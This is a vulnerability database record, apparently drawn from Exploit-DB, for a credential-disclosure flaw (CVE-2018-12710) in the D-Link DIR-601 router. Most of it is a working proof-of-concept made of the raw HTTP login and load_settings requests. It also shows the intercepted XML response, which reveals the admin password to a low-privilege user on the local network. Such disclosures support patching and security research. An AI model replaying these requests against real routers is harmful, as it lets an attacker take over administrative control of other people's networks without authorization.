ID

VAR-E-201808-0147


CVE

cve_id:CVE-2018-12710

Trust: 1.0

sources: EXPLOIT-DB: 45306

EDB ID

45306


TITLE

DLink DIR-601 - Credential Disclosure - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 45306

DESCRIPTION

DLink DIR-601 - Credential Disclosure. CVE-2018-12710 . webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 45306

AFFECTED PRODUCTS

vendor:dlinkmodel:dir-601scope: - version: -

Trust: 1.6

sources: EXPLOIT-DB: 45306 // EDBNET: 99136

EXPLOIT

# Exploit Title: DLink DIR-601 - Credential Disclosure
# Google Dork: N/A
# Date: 2018-06-24
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www.dlink.com
# Software Link: N/A
# Version: Firmware: 2.02NA Hardware Version B1
# Tested on: Windows 10 + Mozilla Firefox
# CVE : CVE-2018-12710

# 1. Description
# Being local to the network and having only "User" account (which is a low privilege account)
# access, an attacker can intercept the response from a POST request to obtain "Admin"
# rights due to the admin password being displayed in XML.

# 2. Proof of Concept
# Tools to use:
# - BurpSuite
# - Browser of your choice

# 3: Login with "User" role account:
*My "User" role account does not have a password in this example*
POST /my_cgi.cgi?0.4008728147399542 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-AU,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/login_real.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
DNT: 1
Connection: close

request=login&user_user_name=dXNlcg==&user_user_pwd=&user_type=1

# 4: When logged into the access point, click on the Tools option

# 5: You should see a request similar to the following:

POST /my_cgi.cgi?0.9277791631615954 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-AU,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/tools_admin.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 277
DNT: 1
Connection: close

request=load_settings&table_name=admin_user&table_name=user_user&table_name=graph_auth&table_name=remote_management&table_name=system&table_name=virtual_server&table_name=port_forwarding&table_name=application_rules&table_name=inbound_filter&table_name=fw_ver&table_name=hw_ver

# 6: Right click on this request and choose "Do Intercept response from this request"

# 7: You will see a response similar to the following:

HTTP/1.1 200 OK
Content-type: text/xml
Connection: close
Date: Sat, 01 Jan 2011 00:19:56 GMT
Server: lighttpd/1.4.28
Content-Length: 20088

<?xml version="1.0" encoding="UTF-8"?><root><login_level>0</login_level><admin_user><admin_user_name>admin</admin_user_name>
<admin_user_pwd>testagain</admin_user_pwd><admin_level>1</admin_level></admin_user><user_user><user_user_name>user</user_user_name>
<user_user_pwd></user_user_pwd><user_level>0 ...

Trust: 1.0

sources: EXPLOIT-DB: 45306

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 45306

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 45306

TYPE

Credential Disclosure

Trust: 1.6

sources: EXPLOIT-DB: 45306 // EDBNET: 99136

CREDITS

Kevin Randall

Trust: 0.6

sources: EXPLOIT-DB: 45306

EXTERNAL IDS

db:EXPLOIT-DBid:45306

Trust: 1.6

db:NVDid:CVE-2018-12710

Trust: 1.0

db:EDBNETid:99136

Trust: 0.6

sources: EXPLOIT-DB: 45306 // EDBNET: 99136

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2018-12710

Trust: 1.0

url:https://www.exploit-db.com/exploits/45306/

Trust: 0.6

sources: EXPLOIT-DB: 45306 // EDBNET: 99136

SOURCES

db:EXPLOIT-DBid:45306
db:EDBNETid:99136

LAST UPDATE DATE

2022-07-27T09:18:16.750000+00:00


SOURCES RELEASE DATE

db:EXPLOIT-DBid:45306date:2018-08-30T00:00:00
db:EDBNETid:99136date:2018-08-30T00:00:00